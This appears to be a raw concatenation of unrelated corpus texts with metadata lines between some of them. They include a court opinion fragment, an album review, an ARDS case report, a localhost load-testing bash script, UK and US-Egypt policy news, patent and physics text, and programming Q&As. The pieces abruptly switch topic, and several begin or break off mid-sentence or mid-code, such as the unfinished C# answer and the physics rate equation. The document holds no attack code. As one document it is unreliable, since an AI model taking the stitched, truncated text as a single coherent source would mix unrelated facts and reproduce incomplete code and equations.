We now address Avondale's argument that the ALJ should have calculated Pulliam's post-injury wage earning capacity by using all forty-four jobs. Avondale argues that the ALJ acted improperly in finding that Pulliam was not diligent and that he had applied for all but five of the forty-four jobs. While we agree that these findings seem inconsistent, we give deference to an ALJ's findings of fact. Wilkerson v. Ingalls Shipbuilding, Inc., 125 F.3d 904, 906 (5th Cir.1997). It is reasonable that the ALJ could find that Pulliam merely applied for most of the forty-four jobs and yet was not diligent in his job search. Thus, we do not find error in the ALJ using the five jobs to determine the average.
For the above reasons we AFFIRM.
We note that the ALJ stated that Pulliam contacted all but six of the prospective employers; however, we are concerned with only five of those jobs because Pulliam gave no explanation for failing to contact those prospective employers
Under the LWHCA, the ALJ calculates loss of wage earning capacity by taking two thirds of the difference between the average of what the worker had earned and what the worker can earn post-injury. See 33 U.S.C. § 908(c)(21)
The ALJ had initially found that the average of the five jobs was $5.25/hour. The BRB adjusted the average to $5.99/hour
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A virtuoso prodigy of smooth and sophisticated classical guitar, Armik discovered the flamenco music of Spain while a student abroad and never let it go. Guitarista is a fine example of his craft; you can tell by the splashy red cover that it’s going to be an unabashedly romantic set of nuevo flamenco, a hybrid genre of flamenco guitar crossbred with Latin and Caribbean influences. His brooding countenance in the painted center portrait bespeaks his approach: The old-fashioned romantic smolder runs large upon his instrument of choice. Musically, this is playful, intricate, and lulling—the ideal choice for a hot afternoon as it slowly melts into evening. And no doubt about it, the man can play.
Tracks alternate freely between frenetic gypsy-style dances and slow burners. There’s a salsa crunch to “Fire Within,” which finds Armik’s dazzling fingers emitting speed-of-light arpeggios over a light drum outline with dashes of horn flavor. After a few bars, he delves headlong into some jaw-dropping pyrotechnics, making this a standout track. Celebration is the mood for “Road to Hana,” with Armik’s guitar alternately riding and floating over a clip-clop percussive caravan. Throughout the album, judiciously employed piano chords and mariachi trumpets keep Armik’s dazzling virtuosity within a song’s structured context.
For the kind of seduction strategy employed by the greatest of lovers, try the final track, “Noche de Guitarra.” Here Armik uses his precision mastery to elaborate the potential of the acoustic classical guitar as an instrument of angels in devil’s clothing; even the staunchest puritan resistance is bound to melt under its slow heat. A steady rhythm guitar keeps a quietly chugging tempo going in the background while Armik steps to the spotlight to show your ears how fluid craftsmanship can equal inspired, romantic poetry. What at first listen may sound like mere flamenco-patterned aural wallpaper becomes an exotic inward spiral of complex dynamics and melodic counterpoints as one closes one’s eyes and submits to the caresses of a lover or to the moon beaming in from the window over closed eyelids. Armik knows exactly what he’s doing every microsecond, and there’s no need to second-guess. In the same way that you find all of your resistance melting under the assured hands of a qualified and skilled masseur, you will trust Armik and his classical guitar to carry you aloft into hot, wild Spanish winds. | {
"pile_set_name": "Pile-CC"
} |
1. Introduction {#sec1}
Acute respiratory distress syndrome (ARDS) incorporates a cluster of clinical features including shortness of breath and tachypnea and is defined by the Berlin criteria as having an acute onset with the development of hypoxemia and bilateral pulmonary opacities on radiographic imaging \[[@B1]\]. There are many causes of ARDS; however, most often, it is triggered by infections, blood transfusions, direct lung injury, and toxins \[[@B2]\]. Treatment includes removal of the inciting cause, supportive therapy, and the attainment of sufficient blood oxygenation. Adequate oxygenation in ARDS is often achieved by endotracheal intubation and mechanical ventilation. Noninvasive positive pressure ventilation (NIPPV) has been less frequently indicated as an alternative form of adequate oxygenation. Typically, its use is focused and intended on preventing complications that are associated with invasive ventilation such as barotrauma, vocal cord injury, and ventilator-associated pneumonia \[[@B3]\].
Bupropion is an atypical oral antidepressant medication commonly used to treat depression, tobacco dependence, obesity, and hypoactive sexual disorder. Its mechanism of action involves the inhibition and reuptake of norepinephrine and dopamine which can induce a state of euphoria. Because of these effects, bupropion has been reported to be abused recreationally \[[@B4], [@B5]\]. We describe a case of ARDS induced by bupropion inhalation that was treated with NIPPV.
2. Case Presentation {#sec2}
A 30-year-old male with a past medical history significant for polysubstance abuse presented to the emergency department (ED) two hours after ingesting 90 mg of oxycodone and 30 mg of diazepam along with intranasal bupropion. On arrival, he complained of extreme fatigue, respiratory distress, and confusion.
In the ED, he was noted to be lethargic and short of breath. Initial vital signs revealed heart rate of 104 beats per minute, respiratory rate of 35 per minute, and O~2~ saturation of 75% on room air. Respiratory exam revealed diffuse bilateral coarse breath sounds on inspiration and expiration. His laboratory results were notable for a leukocytosis of 14.1 K, creatinine of 1.25 g/dl, lactate of 4.1, and an elevated procalcitonin level. Venous blood gas analysis showed a pH of 7.18 with a pCO~2~ of 51 mmHg. Chest X-ray (CXR) demonstrated diffuse bilateral alveolar infiltrates ([Figure 1(a)](#fig1){ref-type="fig"}). Computed tomography (CT) of the chest showed diffuse bilateral airspace disease characterized by groundglass and consolidative opacities with relative peripheral lung sparing and perihilar predominance ([Figure 2](#fig2){ref-type="fig"}). He received naloxone with mild improvement in mental status and was initiated on Bilevel Positive Airway Pressure (BiPAP) with an inspiratory positive airway pressure (IPAP) of 15 cm H~2~O, expiratory positive airway pressure (EPAP) of 5 cm H~2~O with 40% fraction of inspired oxygen (FiO~2~). Empiric broad spectrum antibiotics including vancomycin, cefepime, and metronidazole were initiated along with intravenous methylprednisolone 40 mg every 12 hours.
Initially while on BIPAP, he remained tachypneic and tachycardic. His respiratory rate improved over the following 6 hours. He was gradually weaned off BiPAP to nasal cannula oxygen over the course of 36 hours while receiving ongoing corticosteroid and antibiotic therapy.
Repeat CXR on hospital day \#6 showed markedly improved bilateral airspace opacities ([Figure 1(b)](#fig1){ref-type="fig"}). After 6 days, he was discharged in stable condition without requiring supplemental oxygen.
3. Discussion {#sec3}
ARDS is associated with a high mortality that has declined from over 50% to 30% over the last four decades \[[@B6], [@B7]\]. This is primarily due to implementation of lung-protective ventilation protocols and intensified research after formation of the National Heart, Lung, and Blood Institute (NHLBI) ARDS network \[[@B8], [@B9]\]. This case highlights a mild manifestation of ARDS as a result of bupropion inhalation, an exceedingly rare etiology.
The Food and Drug Administration (FDA) classifies bupropion as a psychiatric medication with low abuse potential \[[@B10]\]. However, several case reports and studies have indicated increasing recreational use of bupropion mostly intravenously or intranasally \[[@B11]--[@B13]\]. Lewis et al. conducted a review on bupropion inhalation in a total of 67 patients. Seizures were noted as a common adverse effect occurring in 30% of patients. Acute lung toxicity was not reported as a complication \[[@B14]\]. We were not able to find a second reported case of bupropion-inhalation-induced ARDS.
Endotracheal intubation and mechanical ventilation are mostly required to ensure adequate oxygenation, but this was avoided in this patient as we maintained adequate oxygenation with BiPAP alone. NIPPV is advantageous in such patients as it does not expose them to the potential complications of invasive ventilation and may shorten their hospital length of stay \[[@B3]\]. There is, however, an ongoing debate concerning the most effective mode of NIPPV \[[@B15], [@B16]\]. Recent studies show that noninvasive ventilation can be used in mild cases of ARDS with acute nonhypercapnic hypoxemic respiratory failure \[[@B17]\]. In these cases, BiPAP via facemask is the most commonly used strategy \[[@B18]\]. Another approach with high-flow nasal cannula was shown to have a similar degree of treatment failure and incidence of subsequent intubation as BiPAP. High-flow nasal cannula, however, was associated with decreased 90-day mortality as compared to BiPAP \[[@B19]\]. A randomized, single-center trial by Pohlman et al. showed that delivering noninvasive ventilation via helmet instead of by facemask was associated with a significant reduction in intubations. There was also a decrease in intensive care unit length of stay and mortality at 90 days \[[@B20]\]. However, a subset analysis of the observational "LUNG-SAFE" study for patients with severe ARDS (defined as a PaO~2~/FiO~2~ ratio below 150 mmHg) showed increased mortality with noninvasive ventilation \[[@B21]\].
Per our review, data on the use of noninvasive ventilation in the management of ARDS remains inconclusive and conflicting. NIPPV may decrease the incidence of ventilator-associated complications; however, given that its efficacy is not well established, patients with ARDS should still be treated in a critical care setting for close monitoring with invasive ventilation available on standby.
4. Conclusion {#sec4}
Advances in the treatment of the underlying etiologies and improvement in mechanical ventilation strategies have led to a decrease in the overall mortality associated with ARDS. Despite these developments, it remains a diagnosis with an exceedingly high mortality. New emerging data indicates that NIPPV can be a beneficial and equivalent approach for a subset of patients with ARDS, although the optimal type of noninvasive ventilation and patient group that would benefit most is yet to be determined.
Conflicts of Interest
All authors declare no conflict of interest.
[^1]: Academic Editor: Mabrouk Bahloul
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#!/bin/bash -e
export URL="http://localhost:3000"
echo "Bulk loading"
./populate.py -d 8 --destination=$URL --domain="mydomain" --bulk
echo "The home page"
wrk -c 10 -d5 -t5 $URL | grep Requests
echo "Single word search 'p'"
wrk -c 10 -d5 -t5 "$URL/v1?q=p&d=mydomain" | grep Requests
echo "Single word search 'python'"
wrk -c 10 -d5 -t5 "$URL/v1?q=python&d=mydomain" | grep Requests
echo "Single word search 'xxxxxx'"
wrk -c 10 -d5 -t5 "$URL/v1?q=xxxxx&d=mydomain" | grep Requests
echo "Double word search 'python', 'te'"
wrk -c 10 -d5 -t5 "$URL/v1?q=python%20te&d=mydomain" | grep Requests
echo "Double word search 'xxxxxxxx', 'yyyyyyy'"
wrk -c 10 -d5 -t5 "$URL/v1?q=xxxxxxxx%20yyyyyy&d=mydomain" | grep Requests
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Proposed new laws to "limit the impact" of UK-wide welfare reforms in Scotland have been passed by MSPs.
A special Holyrood committee said there were "grave concerns" over Westminster plans for a new universal credit.
The Scottish Parliament cannot stop Westminster changing the welfare benefits system.
But Holyrood moved to pass new legislation to ensure people still have access to certain benefits, after MSPs protested against the UK reforms.
The Scottish Parliament approved the Welfare Reform (further provision) (Scotland) Bill unanimously.
Single credit
The UK government wants to replace child tax credit, working tax credit, housing benefit, income support and others, in favour of a single, universal credit from 2013.
The coalition says the changes would save £7bn in welfare spending and encourage people currently on benefits to go out and find a job.
But Labour MSPs and the Scottish government said many in need of vital support would be worse off.
This bill is not one which either the government or the opposition would wish to be necessary Drew Smith, Labour
Deputy First Minister Nicola Sturgeon told Holyrood: "The only way we can ensure Scotland is no longer subject to the kinds of reforms that David Cameron was setting out earlier this week, the only way to protect Scotland from that is to make sure powers for these matters pass to this parliament."
Labour's Drew Smith added: "This bill is not one which either the government or the opposition would wish to be necessary, but necessary it is and, when passed, it will mark the beginning of a new phase of considerations where we should look for opportunities to improve what we do, rather than just shore up our own parts of the system in the face of cuts coming from elsewhere."
Alex Johnstone, for the Tories, said his party had agreed to support the bill but expressed "disappointment" that it had become necessary to do so.
"We will continue to take the same position on welfare reform that we have had for a number of years," he stressed.
Last December, the Scottish Parliament took the unprecedented step of voting against a Westminster "consent" motion, under which the UK government wanted Holyrood's permission to change the law, so its reforms would fit the Scottish system.
MSPs decided to make the necessary legal changes themselves, and the Scottish government brought forward its own legislation to ensure policies tied to the UK benefits system, like free school meals and disabled parking, continue.
MSPs support some aspects of the UK Welfare Reform Bill, including changes to data sharing, industrial injuries benefits and a new commission on social mobility and child poverty. | {
"pile_set_name": "OpenWebText2"
} |
Leonardo Ramirez, § No. 08-19-00097-CR
Appellant, § Appeal from the
v. § 41st District Court
The State of Texas, § of El Paso County, Texas
State. § (TC# CR 20170D04632)
The Court GRANTS the Court Reporter’s third request for an extension of time within
which to file the Reporter’s Record until August 12, 2019. NO FURTHER REQUESTS
It is further ORDERED that Bertha A. Prieto, Official Court Reporter for the 41st District
Court, for El Paso County, Texas, prepare the Reporter’s Record for the above styled and
numbered cause and forward the same to this Court on or before August 12, 2019.
IT IS SO ORDERED this 29th day of July, 2019.
Before McClure, C.J., Rodriguez and Palafox, JJ.
| {
"pile_set_name": "FreeLaw"
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Media streams, such as video and audio streams, may be sent over a network to multiple receiving clients. In a unicast-based system, individual copies of the stream are sent separately over the network to each client. By contrast, in a multicast-based system, a single copy of the stream may be sent to a multicast address, and the multicast-enabled network enables replication of the stream to clients within the multicast group. In some cases, a client may record or store the stream for later playback. In some scenarios, media streams may be sent using transmission control protocol (TCP) for reliability, at a cost of higher latency. In other scenarios, media streams may be sent using user datagram protocol (UDP) with lower latency, at a cost of potentially increased errors or dropouts. | {
"pile_set_name": "USPTO Backgrounds"
} |
I have a 93 lexus es 300. The car will sometimes start and after a few minutes the check engine light turns on and it will have no throttle while idling . Sometimes it will drive but then this happens while driving as well. The throttle will just go out and it wont even rev if I stomp on the peddle. I turn it off hoping it will reset it back on and it wont turn over.
I have tried googling it but to no luck please help if you can thank you | {
"pile_set_name": "Pile-CC"
} |
Aztecs' Lindley looking to impress NFL
San Diego State quarterback Ryan Lindley (17) passing Monday afternoon during the Senior Bowl South squad practice at W.C. Majors Field in Fairhope, Ala. Press-Register/John David Mercer
— Press-Register/John David Mercer
San Diego State quarterback Ryan Lindley (17) passing Monday afternoon during the Senior Bowl South squad practice at W.C. Majors Field in Fairhope, Ala. Press-Register/John David Mercer
/ Press-Register/John David Mercer
MOBILE, Ala. You won’t find Andrew Luck or Robert Griffin III at the Senior Bowl.
Over the past seven years, only one Senior Bowl quarterback (Jake Locker) has been drafted in the top 10 and just six Senior Bowl quarterbacks have gone in the first round.
Almost the only thing that can happen to a player projected to go high in the first round is for his stock to go down after a week of practicing in front of virtually every NFL personnel man and coach. The draft process, after all, is mostly about tearing apart every player’s game.
So it behooves Luck and Griffin to preserve the mystery as long as possible.
Conversely, it serves the purpose of Ryan Lindley to be seen early and often.
“It’s almost a second chance; it’s another bowl game and playing with some of the best guys in the country it’s a great opportunity to show your stuff against good competition,” said Lindley, who is one of three quarterbacks on the South roster here and the first San Diego State quarterback to be invited to the Senior Bowl since Dan McGwire in 1991. “… On the West Coast we get isolated in San Diego. It’s definitely a good chance to come out here and get it going.”
Every player, and quarterback perhaps particularly, that comes here does so looking to raise his stock as much as possible by showing how hard he works in practice, how quickly he picks up on pro schemes, the mechanical changes he’s made since college and that he can fare well against other top players.
In the three days that matter most – before most NFL types left town en masse on Wednesday afternoon – Lindley has evidently shown he belongs.
One personnel man assessed the other two quarterbacks on the South roster, Oklahoma State’s Brandon Weeden and Arizona’s Nick Foles, might be first-round talents, even though they will not be first-round picks. Lindley entered this week projected as a third-round pick.
“This is a good comparison for him,” said one scout who before this week had seen Lindley just once on TV. “He’s stacking up well.”
Lindley started Monday’s practice slowly but finished well, and he was particularly sharp Tuesday throwing while moving outside the pocket and on short and intermediate routes – something Lindley has been working on with former NFL and SDSU coach Ted Tollner the past month.
“I really like him,” one AFC scout said after Tuesday’s practice. “He’s got a quick release, and he’s really accurate.”
That will be music to the ears of Lindley’s camp, as he is coming off a season in which he completed just 52.5 percent of his passes, a factoid certain to be brought up again and again between now and the end of April.
NFL coaches who were asked about Lindley before this week’s first practice were familiar only with his name. Three coaches said they had heard he struggled in 2011.
It will be on Lindley to answer questions – literally and on the field – about why his numbers were down and what he’s done to take his game to the next level.
To his credit, Lindley did not mention the Aztecs' young receiving corps when asked repeatedly about his low completion percentage. He instead talked about what he can do better.
“I’m just trying to show some consistency I can put the ball where it needs to be and I can do it every play,” said Lindley, who left SDSU as the school’s all-time leader in passing yards (12,690), touchdown passes (90), completions (961) and starts by a quarterback (49). “The biggest thing is my feet, and that’s going to set up the accuracy … I wasn’t consistent. I didn’t do a good job of that. It something I can work on.”
Lindley has been working up to three times a week with Tollner, who retired last year after almost 30 years as a college head coach and NFL offensive coordinator and assistant.
“He can make all the throws,” said Tollner, who is also the father of Lindley’s agent, Bruce Tollner. “He’s not limited by his skills. He just needs reps and work, and he wants to do it.”
One day this month, Bruce Tollner arranged for an NFL secondary coach to speak to his defensive backs who are potential draftees. Tollner told Lindley he could go home and get some lunch while the coach talked nuances of playing defensive back in the NFL. Lindley stayed and listened for two hours.
“I’m impressed with the fact he likes to work,” Ted Tollner said. “… Once the draft is over and he gets to some team’s camp, I think it will be nothing but upside. | {
"pile_set_name": "Pile-CC"
} |
A novel illegitimate recombination event: precise excision and reintegration with the Mu gem mutant prophage.
The bacteriophage Mu is known to insert its DNA more or less randomly within the Escherichia coli chromosome, as do transposable elements, but unlike the latter, precise excision of the prophage, thereby restoring the original sequence, is not observed with wild-type Mu, although it has been reported with certain defective mutants. We show here that the mutant prophage Mu gem2ts can excise precisely from at least three separate loci -- malT, lac and thyA (selected as Mal+, Lac+ and Thy+, respectively). This excision occurs under permissive conditions for phage development, is observed in fully immune (c+) lysogens, and is independent of RecA and of Mu transposase. Mu gemts2 excision is invariably accompanied by reintegration of a Mu gem2ts prophage elsewhere in the chromosome. In the case of Mal+ revertants, this prophage is systematically located at 94 min on the E. coli chromosome. Mu gem2ts excision therefore sheds some light on the long-standing paradox of the lack of precise Mu excision. | {
"pile_set_name": "PubMed Abstracts"
} |
optimizing memory resources for a big query response
I have to perform a query that can generates a very big string in response (up to 1Gb), which is basically a big, big JSON array. Yes, pagination is in order but I'm stressing the concept in order to get you the idea.
Symfony simply uses doctrine to get the response:
$stmt = $this->getEntityManager()->getConnection()->prepare(self::Q_GET_NUM_TIMEBOX);
$stmt->bindValue('t_end', $tEnd);
$stmt->bindValue('t_granularity', $tGranularity);
$stmt->bindValue('t_span', $varSelection->getStart());
$resData = $stmt->fetchColumn(0);
and then I create a Response by setting the content I had in return from the execute.
$res = new Response();
$res->headers->set('Content-Type', 'application/json');
Keep in mind I oversimplified the code for the sake of clarity: I actually have a controller, a handler service performing the request and a Repository returning the query response.
Back straight to the problem: this implies that PHP must hold that big amount of data in memory and I was wondering if there was an lighter way to return the response in order to stress less PHP engine with big amount of data.
this implies that PHP must hold that big amount of data
PHP is not required to keep in the memory a whole response body. Through output buffers and Symfony response streaming you can fetch result set row-by-row and send a data by chunks. Unfortunately I don't known well-tried solution for JSON stream encoding in PHP, but you can implement it manually (1, 2).
Update (2017-02-27):
Streaming JSON Encoder is a PHP library that provides a set of classes to help with encoding JSON in a streaming manner, i.e. allowing you to encode the JSON document bit by bit rather than encoding the whole document at once.
| {
"pile_set_name": "StackExchange"
} |
NEW YORK // Egyptian president Abdel Fattah El Sisi has had a good week.
Newly proposed US foreign aid legislation free of political restrictions and a trip to Europe that has paid sizeable economic and diplomatic dividends have made clear that – for now at least – the momentum for repairing frayed ties with Cairo in the wake of Middle East chaos is showing no signs of slowing down.
After refusing for months to invite Mr El Sisi to Germany on a state visit, chancellor Angela Merkel held talks with the Egyptian president in Berlin on Tuesday. While she said there are differences over Egypt’s domestic policies, such as the spate of death sentences for political opponents, the emphasis was not on criticism but common core security interests.
“I think that if one wants to be partners and solve complex issues, we have to be able talk about these things ... this doesn’t mean that we can’t work very, very closely on other issues,” Ms Merkel said, capturing the international sentiment.
The German leader’s previous position may have been tempered by the economic opportunities that Egypt offers German firms. A central aspect of Mr El Sisi’s European trip has been to promote economic ties, and his delegation also held meetings with representatives of major German corporations. It was announced that Egypt had awarded Siemens a record 8 billion euro (Dh32.7bn) contract to supply gas and steam power to significantly increase Egypt’s electricity generation.
On Friday, Mr El Sisi held bilateral talks with the Hungarian prime minister, Viktor Mihaly Orban, in Budapest, to discuss economic cooperation and counter-terrorism and security.
Egypt is key for a stable Middle East, and “since distances in the modern world have shrunk ... there is no stability in Europe without a stable Egypt,” Mr Orban said.
In Washington, US relations with Egypt had hit a low in 2013 after Mr El Sisi, then a military commander, overthrew Egypt’s conservative president, Mohammed Morsi, after massive protests against his rule grew. US president Barack Obama suspended the annual $1.3bn (Dh4.8bn) in military aid that the United States has given to Egypt since it signed a peace deal with Israel in 1979.
Many within the Obama administration believed, as they still do, that the stifling of political dissent and the crackdown on the Muslim Brotherhood will eventually lead to a new generation of radicalised Egyptians who will pose a security threat to the US, Egypt and the region.
The freeze in the aid deeply angered Egyptian officials who were infuriated that, as they saw it, the administration withheld crucial equipment while they fought extremists in the Sinai Peninsula and on the border with Libya.
But since the rampage of ISIL extremists across the region over the past year, the White House has steadily lifted the holds on aid out of security concerns. The only hold that has not been lifted was a democracy restriction that required the secretary of state to certify to congress that Egypt was taking steps towards full democracy, including by holding parliamentary elections.
On June 2, however, the US congress moved a step closer to fully returning to the status quo aid relationship, with a House subcommittee introducing a draft of the 2016 foreign aid budget, worth $1.5bn overall (including military and non-military aid), which is free of any such reform conditions.
The new bill would only require that the administration certifies that Cairo is sustaining its strategic relationship with the US and abiding by its peace treaty with Israel. It would also require the secretary of state to issue a classified report every 90 days that Egypt is taking steps to protect human rights and hold elections, but there are no conditions tied to this.
However, the draft budget is currently only the subcommittee version and has yet to go through the full foreign relations committee. There will also be a version submitted over the summer by the Senate, where there are a number of powerful critics of Egypt. As a result, a final congressional vote on the budget is unlikely to happen before December.
Perhaps in a concession to critics of Egypt in congress and the administration, the bill allows for $150 million of the total aid budget to go to non-governmental groups and democracy programmes in the form of economic support funds, and that Cairo would only receive money for budget support if the administration certifies it is stabilising its economy and implementing “market-based economic reforms”.
“Egypt is critical to the stability of the Middle East. I respect that president Sisi has called on religious leaders to reject radical terrorism, and Egypt must continue to build a strong diverse democracy. And we must continue to help them create jobs and grow their economy,” Dutch Ruppersberger, a Democrat on the foreign aid subcommittee, said in a statement to The National. “That said, we need to ensure we protect our other ally, Israel, and work through some of the outstanding issues regarding foreign aid restrictions.”
Some in the new Republican-dominated congress, in both parties, especially the House, have been vocally supportive of Mr El Sisi and a number of delegations have visited Cairo for talks with the Egyptian president.
“The security issue is what made people in congress who otherwise would not have cared much to get on board with the idea that this is not the time for us to put on any types of restrictions” on aid, said Mokhtar Awad, an analyst of US-Egypt relations at the Center for American Progress think tank in Washington.
At times, the US administration has had a contradictory stance on Egypt, but analysts doubted whether it would push for the restrictions to be reinserted.
“There are people in the administration who are very frustrated with the actions of the Egyptian government,” said Stephen McInerney, executive director of the Project on Middle East Democracy in Washington. In its last report explaining its refusal to grant a democracy certification to Egypt, the US state department was scathing in its assessment of the El Sisi government.
But the public disapproval has been muted, and the tone become more positive, though Egypt policy as a whole is not near the top of the US’ list of priorities in the region.
“For the most part they (the Obama administration) don’t feel like the US has the ability to influence the behaviour of the Egyptian government and there is not much appetite to take any real tough stands,” Mr McInerney added.
When Mr Obama announced his intention to fully resume military aid in late March, he also said that the nature of the aid would shift away from big-ticket items and weapons that the Egyptians wanted, to things the US feels are best suited to address Egypt’s security challenges.
Aid would be channelled into a handful of categories, counterterrorism, counter-insurgency in Sinai, maritime security and border protection, Mr Obama said at the time. The credit system that allowed Egypt to buy what they wanted long in advance of receiving aid would also be abolished, giving the US yet more control.
So far, Mr Awad said, there have been few concrete steps towards this recalibration and clarity on what the administration wants from Egypt in return for the full resumption of aid. There are real concerns in the administration about Egypt’s strategy for dealing with extremism, but the US has not made clear how it will tie its aid to a more effective strategy by Cairo.
“At a policy level the administration needs to be able to clearly articulate and tie its [aid] commitments to security deliverables from Cairo,” Mr Awad said. “Without that they won’t bring many dividends to the US.”
[email protected] | {
"pile_set_name": "OpenWebText2"
} |
Exchanging variables between 2 classes
Whenever I call the method Draw in Sprite, it won't draw it because X, Y, Width and Height are 0. :(
class Sprite
protected int Y;// { get; set; }
protected int X;// { get; set; } { get; set; }
protected int Width;// { get; set; } { get; set; }
public int Height;// { get; set; } { get; set; }
protected Image image;// { get; set; } { get; set; }
public Sprite()
public void Draw(Graphics drawArea)
Image sImage = Image.FromFile("alien.jpg");
drawArea.DrawImage(sImage, X, Y, Width, Height);
class User:Sprite
public User()
public User(int width, int height, int userWidth, int userHeight)
Sprite sprite = new Sprite();
Image UserImage = Image.FromFile("alien.jpg");
X = width;
Y = height;
Width = userWidth;
Height = userHeight;
image = UserImage;
ps: sprite.Draw is declared in another method in another class, but that all should work just fine.
Thanks for helping and probably saving me hours of time :)
here is the subclass which gives the parameter and other stuff.
Alien mAlien;
User mUser;
protected int mLevel;
public gameLogic()
public gameLogic(int width, int height, int level)
mUser = new User(width / 2, height - 30, 30, 30);
mAlien = new Alien(width / 2, 5, 30, 30, "alien.jpg", 10 * level);
mLevel = level;
public void drawAll(Graphics drawArea)
Sprite sprite = new Sprite();
Im sorry for all these errors that'll probably occur, Im a new student :)
Try this:
public User(int width, int height, int userWidth, int userHeight)
Sprite sprite = new Sprite();
Image UserImage = Image.FromFile("alien.jpg");
sprite.X = width;
sprite.Y = height;
sprite.Width = userWidth;
sprite.Height = userHeight;
sprite.image = UserImage;
In order to access the fields of the sprite, you have to specify which Sprite object you are modifying. This is done by writing the name of the variable followed by .
EDIT: Just realized that there is another problem - your User class is inheriting from the Sprite class. Apparently your users are sprites, according to the comments, so you'll want to never instantiate a Sprite, and just use the User class instead:
class User:Sprite
public User(int width, int height, int userWidth, int userHeight)
Image UserImage = Image.FromFile("alien.jpg");
X = width;
Y = height;
Width = userWidth;
Height = userHeight;
image = UserImage;
Then instead of calling draw on a sprite in the other file, use the following:
User user = new User(x, y, width, height)
The key here is to make sure you are using new User... and not new Sprite - even if you are assigning to a Sprite variable e.g. Sprite s = new User(...);.
Then just make sure you call draw on the same object - the user.draw line. If you want to check that you're doing it right, try making Sprite abstract - abstract class Sprite - that way there will be compile errors if you try to instantiate Sprite instead of User.
EDIT 2: Ok, all you really need to do is change your calling code:
public void drawAll(Graphics drawArea)
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"pile_set_name": "StackExchange"
} |
abstract: 'We investigate the influence of quantum fluctuations and weak disorder on the vortex dynamics in a two-dimensional superconducting Berezinskii-Kosterlitz-Thouless system. The temperature below which quantum fluctuations dominate the vortex creep is determined, and the transport in this quantum regime is described. The crossover from quantum to classical regime is discussed and the quantum correction to the classical current-voltage relation is determined. It is found that weak disorder can effectively reduce the critical current as compared to that in the clean system.'
- 'Aleksandra Petkovi'' c$^{1,2}$, Valerii M. Vinokur$^{2}$, and Thomas Nattermann$^{1}$'
date: ','
title: '<span style="font-variant:small-caps;">Transport properties of clean and disordered Josephson junction arrays</span>'
The physics of the Berezinskii-Kosterlitz-Thouless (BKT) transition in thin superconducting films is re-emerging as one of the mainstreams in the current condensed matter physics. The interest is motivated by recent advances in studies of layered high-temperature superconductors [@Ruef-2006; @Matthey-2007], the discovery of the superconductivity at the interface between the insulating oxides [@Reyren-2007; @Caviglia-2008], new studies in thin superconducting films uncovering the role of the two-dimensional (2D) superconducting fluctuations [@Crane-2007; @Pourret-2006], and the intense developments in the physics of the superconductor-insulator transition where the BKT transition may play a major role [@Vinokur-Nature].
The predicted benchmark of the transition that serves to detect it experimentally is the change of the shape of the $I$-$V$ characteristics, $V\propto I^{1+\alpha}$ from $\alpha=0$ above the transition, $T>T_{BKT}$, to $\alpha=2(T_{BKT}/T)$ at $T\leq
T_{BKT}$ [@HN; @Minnhagen]. However, experimental data on superconducting films show appreciable deviations from the theoretical predictions and are still inconclusive [@exp]. Among the possible sources of the deviation from the classic predictions, one can consider the finite size effect, [@Kogan; @GV] and effects of disorder [@Na+_95; @KoNa_96; @Giam]. Another important issue is the role of quantum effects which become crucial when the BKT transition occurs at low enough temperatures. In this Brief Report we will analyze the role of quantum effects in the BKT transition paying a special attention to the intermediate region of the interplay between thermal and quantum contributions. We will discuss the effect of disorder-generated vortices on the BKT transition, neglecting quantum fluctuations, namely the effective reduction of the critical current as compared to that in clean samples.
*Model.* We choose a disordered Josephson junction array as a convenient discrete model for the 2D disordered superconducting film [@EcSc_89]. The Hamiltonian describing the system is: $$\label{eq:H}
{\cal H} = \frac{1}{2} \sum_{i,j} ( C^{-1})_{i,j}\hat n_i\hat n_j -J\sum_{\langle i,j\rangle}\cos (\hat \varphi_i-\hat \varphi_{j}-A_{ij})$$ where $[\hat n_j, \hat \varphi_k]=-2e i\delta_{j,k}$. We ignore single electron tunneling and other sources of dissipation. The only non-vanishing elements of the capacitance matrix $C_{ij}$ are its diagonal elements $C_{jj} =4C$ (no summation over the repeated index) and $C_{ij}=-C$ for the nearest neighbors $i,j$, i.e., the capacitance to the ground is assumed negligible as compared to the mutual capacitances of the superconducting islands. The second sum in (\[eq:H\]) is taken over all nearest-neighbor pairs on a square lattice. Random phase shifts $A_{ij}$ result from the deviations of the flux in a distorted plaquette from an integer multiple of the flux quantum $\Phi_0=\hbar c/2e$ [@Granato+86].
In the clean classical case, i.e. for $A_{ij}=0$ and in the limit $C\to \infty$, the physics of the system can be most adequately described in terms of vortices that experience the superconducting BKT transition at the temperature $T_{BKT}\simeq \pi \widetilde{J}/2$, where $\widetilde{J}$ denotes the renormalized coupling constant. It is convenient to decompose the phase at the site $i$, as $\varphi_i = \varphi_i^{(v)}+\varphi_{i}^{(sw)}$ where $(v)$ and $(sw)$ stand for the vortex and the spin wave part, respectively. Then, the vortex Hamiltonian can be written as $$\begin{aligned}
\mathcal{H}_{v}=&-{J\pi} \sum_{i\neq j} m_{i} m_j \ln{ \frac{| {\bf r}_{i}-{\bf r}_{j}|}{ \xi}} +\sum_i E_c m_i^2,\end{aligned}$$ where $E_c$ denotes the core energy of a vortex. The sums are taken over the sites ${\bf r}_i$ of a dual lattice; $m_i$ is the vorticity of the $i$th vortex, and we assumed that $\sum_i m_i=0$, where $\xi$ denotes the superconductor coherence length.
Next we want to include quantum fluctuations. After going over to the path integral representation of the partition function and integrating out the charge degrees of freedom, the action of the Josephson junction array in the limit $E_c=e^2/2C \ll J$ assumes the form [@EcSc_89; @fazio91] $$\begin{aligned}
S=\int d\tau \left(\frac{M}{2}\sum_{i}(\partial_{\tau}\mathbf r_{i})^2
+{\cal H}_v\right).\end{aligned}$$ The vectors ${\bf r}_i(\tau)$ are the world lines of the vortices and $M=h^2 C /(8 e^2 \xi^2)$.
*Clean case*. We begin with the discussion of a clean case. If we apply an external transport current, it will exert the force ${\bf f}\sim {\bf j}$ on the vortices, where $\bf{j}$ is the current density [@Tinkham]. This generates an additional term $-\sum_i
m_i{\bf f}\cdot{\bf r}_i$ in (\[eq:H\_v\]). In order to describe the effect of vortices on the current-voltage relation quantitatively, we consider the effect of vortices crossing the system transversely to the transport current. This motion dissipates energy. The Bardeen-Stephen flux flow resistance [@Bardeen] gives for the current-voltage ($V-I$) relation $$V=2\pi\xi^2\rho_nn_vI$$ where $n_v$ is the vortex density and $\rho_n$ is the normal state resistivity. The rate equation for the vortex density is $$\begin{aligned}
